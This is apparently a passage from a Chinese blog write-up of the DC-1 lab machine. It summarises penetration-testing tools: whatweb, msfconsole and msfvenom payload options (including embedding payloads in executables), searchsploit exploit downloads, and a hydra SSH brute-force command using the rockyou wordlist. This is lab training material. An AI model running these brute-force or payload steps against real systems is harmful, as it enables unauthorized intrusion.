<h2 id="whatweb指纹识别"><a href="#whatweb指纹识别" class="headerlink" title="whatweb指纹识别"></a>whatweb指纹识别</h2><p>安装：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install whatweb</span><br></pre></td></tr></table></figure></div>

<p>kali中自带的有</p>
<p>参数：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">h 查看帮助信息</span><br><span class="line">--version 查看版本信息</span><br><span class="line">-i 指定要扫描的文件</span><br><span class="line">-v 详细显示扫描的结果</span><br><span class="line">-a 指定运行级别</span><br></pre></td></tr></table></figure></div>

<p> 所有参数：<br> 使用添加whatweb -h查看所有参数</p>
<p>常规扫描：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whatweb url</span><br></pre></td></tr></table></figure></div>

<p>批量扫描</p>
<p>将url全部写入一个txt中，然后使用-i参数指定文件就可以了</p>
<p>扫描结果显示详细内容</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whatweb -v ip</span><br></pre></td></tr></table></figure></div>

<h2 id="msfconsole漏洞扫描利用"><a href="#msfconsole漏洞扫描利用" class="headerlink" title="msfconsole漏洞扫描利用"></a>msfconsole漏洞扫描利用</h2><p>安装：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt install metasploit-framework #kali自带的有</span><br></pre></td></tr></table></figure></div>

<p>使用方法，终端输入msfconsole</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909172414215.png"
                      alt="image-20230909172414215"
                ></p>
<p><strong>msf控制台参数运用</strong></p>
<div class="highlight-container" data-rel="Text"><figure class="iseeu highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">- banner #这个主要是查看metasploit的版本信息，利用模块数量、payload数量等等。 </span><br><span class="line">- use #这个是使用参数。如你要使用到某个利用模块，payload等，那么就要使用到use参数 </span><br><span class="line">- Search #当你使用msfconsole的时候，你会用到各种漏洞模块、各种插件等等。所以search命令就很重要。   使用命令 `help search` 可以查看具体使用方法；   其他使用方法：   查mysql:`search name:mysql`; 查joomla:`search joomla`;查ubutu漏洞：`searchsploit ubuntu 16.04`；查ms08-067漏洞：`search ms08-067` ...... </span><br><span class="line">- show #这个命令用的很多。如果单纯的输入show，那么就会显示出所有的payload，利用模块，post模块，插件等等。但是一般我们都不这么使用。如果要显示利用模块，那么就输入show exploits。如果要显示payload，那么就输入show payloads。</span><br></pre></td></tr></table></figure></div>

<p><strong>生成payload时常见参数说明：</strong></p>
<div class="highlight-container" data-rel="Text"><figure class="iseeu highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">-p, –payload &lt; payload&gt; 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的</span><br><span class="line">-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all</span><br><span class="line"> -n, –nopsled &lt; length&gt; 为payload预先指定一个NOP滑动长度 </span><br><span class="line">-f, –format &lt; format&gt; 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表) </span><br><span class="line">-e, –encoder [encoder] 指定需要使用的encoder（编码器）,指定需要使用的编码，如果既没用-e选项也没用-b选项，则输出raw payload </span><br><span class="line">-a, –arch &lt; architecture&gt; 指定payload的目标架构，例如x86 | x64 | x86_64 –platform &lt; platform&gt; 指定payload的目标平台 </span><br><span class="line">-s, –space &lt; length&gt; 设定有效攻击荷载的最大长度，就是文件大小 </span><br><span class="line">-b, –bad-chars &lt; list&gt; 设定规避字符集，指定需要过滤的坏字符例如：不使用 &#x27;\x0f&#x27;、&#x27;\x00&#x27;; -i, –iterations &lt; count&gt; 指定payload的编码次数 </span><br><span class="line">-c, –add-code &lt; path&gt; 指定一个附加的win32 shellcode文件 </span><br><span class="line">-x, –template &lt; path&gt; 指定一个自定义的可执行文件作为模板,并将payload嵌入其中 </span><br><span class="line">-k, –keep 保护模板程序的动作，注入的payload作为一个新的进程运行 </span><br><span class="line">–payload-options 列举payload的标准选项 </span><br><span class="line">-o, –out &lt; path&gt; 指定创建好的payload的存放位置 </span><br><span class="line">-v, –var-name &lt; name&gt; 指定一个自定义的变量，以确定输出格式 </span><br><span class="line">–shellest 最小化生成payload -h, –help 查看帮助选项 </span><br><span class="line">–help-formats 查看msf支持的输出格式列表</span><br></pre></td></tr></table></figure></div>

<h2 id="searchsploit"><a href="#searchsploit" class="headerlink" title="searchsploit"></a>searchsploit</h2><p>使用方法 ：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit 目标名称</span><br></pre></td></tr></table></figure></div>

<p>下载payload：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit -m exp文件名</span><br></pre></td></tr></table></figure></div>

<h2 id="hydra（ssh爆破工具）"><a href="#hydra（ssh爆破工具）" class="headerlink" title="hydra（ssh爆破工具）"></a>hydra（ssh爆破工具）</h2><div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -l 用户名 -P /usr/share/wordlists/rockyou.txt.gz ssh://ip</span><br></pre></td></tr></table></figure></div>

<p>-l 指定破解的用户，对特定用户破解，-P 指定密码字典。</p>
<p>&#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt.gz是kali自带的。</p>

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li><strong>标题:</strong> DC-1打靶记录</li>
        <li><strong>作者:</strong> GTL-JU</li>
        <li><strong>创建于:</strong> 2023-09-09 17:45:17</li>
        
            <li>
                <strong>更新于:</strong> 2023-09-09 17:46:10
            </li>
        
        <li>
            <strong>链接:</strong> https://gtl-ju.github.io/2023/09/09/DC-1打靶记录/
        </li>
        <li>
            <strong>版权声明:</strong> 本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a> 进行许可。
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/%E6%B8%97%E9%80%8F-%E9%9D%B6%E6%9C%BA-DC%E7%B3%BB%E5%88%97/">#渗透-靶机-DC系列</a>&nbsp;
                        </li>
                    
                </ul>
            

            

            
                <div class="article-nav">
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/09/08/DC-3%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">DC-3靶机打靶记录</span>
                                    <span class="post-nav-item">下一篇</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">此页目录</div>
        <div class="page-title">DC-1打靶记录</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E9%9D%B6%E6%9C%BA%E6%90%AD%E5%BB%BA"><span class="nav-text">一、靶机搭建</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-text">二、信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%9D%B6%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="nav-text">靶机发现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="nav-text">端口扫描</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E4%B8%8E%E5%88%A9%E7%94%A8"><span class="nav-text">三、漏洞扫描与利用</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E6%8F%90%E6%9D%83"><span class="nav-text">四、提权</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%94%E3%80%81%E6%80%BB%E7%BB%93"><span class="nav-text">五、总结</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#whatweb%E6%8C%87%E7%BA%B9%E8%AF%86%E5%88%AB"><span class="nav-text">whatweb指纹识别</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#msfconsole%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E5%88%A9%E7%94%A8"><span class="nav-text">msfconsole漏洞扫描利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#searchsploit"><span class="nav-text">searchsploit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#hydra%EF%BC%88ssh%E7%88%86%E7%A0%B4%E5%B7%A5%E5%85%B7%EF%BC%89"><span class="nav-text">hydra（ssh爆破工具）</span></a></li></ol></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>
            
            

        </div>

        <div class="main-content-footer">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>2023</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">GTL-JU</a>
        </div>
        
            <script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv" class="busuanzi_container_site_uv">
                        访问人数&nbsp;<span id="busuanzi_value_site_uv" class="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="busuanzi_container_site_pv">
                        总访问量&nbsp;<span id="busuanzi_value_site_pv" class="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">由 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a> 驱动</span>
                <br>
            <span class="theme-version-container">主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.1.0</a>
        </div>
        
        
        
            <div id="start_div" style="display:none">
                2023/4/8 0:0:0
            </div>
            <div>
                博客已运行 <span class="odometer" id="runtime_days" ></span> 天 <span class="odometer" id="runtime_hours"></span> 小时 <span class="odometer" id="runtime_minutes"></span> 分钟 <span class="odometer" id="runtime_seconds"></span> 秒
            </div>
        
        
        
            <script async data-pjax>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fa-solid fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fa-solid fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/navbarShrink.js"></script>

<script src="/js/tools/scrollTopBottom.js"></script>

<script src="/js/tools/lightDarkSwitch.js"></script>



    
<script src="/js/tools/localSearch.js"></script>




    
<script src="/js/tools/codeBlock.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/layouts/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js"></script>







<div class="post-scripts pjax">
    
        
<script src="/js/tools/tocToggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            Global.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            Global.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            Global.refresh();
        });
    });
</script>




</body>
</html>
